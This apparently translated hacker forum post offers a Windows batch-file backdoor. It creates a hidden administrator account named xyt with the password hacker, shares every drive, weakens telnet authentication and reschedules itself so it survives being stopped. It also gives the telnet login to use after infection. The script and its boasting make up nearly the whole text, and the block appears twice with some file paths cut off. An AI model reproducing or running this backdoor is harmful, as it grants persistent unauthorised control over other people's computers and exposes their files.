The code idea is from a friend of Shadow Eagle DESERT. The original code is more troublesome. I have made improvements. The advantage of this backdoor is that it is small and will not be killed. Just put it in the SYSTEM32 directory. The code is as follows:
@echo off
@attrib +s + r
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\ > c:\WINNT\SYSTEM32\
@echo at 23:00 c:\WINNT\SYSTEM32\ >> c:\WINNT\SYSTEM32\
@at 11:05 c:\WINNT\SYSTEM32\
@at 23:05 c:\WINNT\SYSTEM32\
@net stop telnet
@net start telnet
@exit
This will run our program in a loop. Even if someone stops it, it will be run again after a few hours. Haha~~
After running, go up the TELNET IP, the user name is xyt and the password is hacker.
@echo off
@attrib +s + r
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\ > c:\WINNT\SYSTEM32\
@echo at 23:00 c:\WINNT\SYSTEM32\ >> c:\WINNT\SYSTEM32\
@at 11:05 c:\WINNT\SYSTEM32\
@at 23:05 c:\WINNT\SYSTEM32\
@net stop telnet
@net start telnet
@exit
This will run our program in a loop. Even if someone stops it, it will be run again after a few hours. Haha~~
After running, go up the TELNET IP, the user name is xyt and the password is hacker.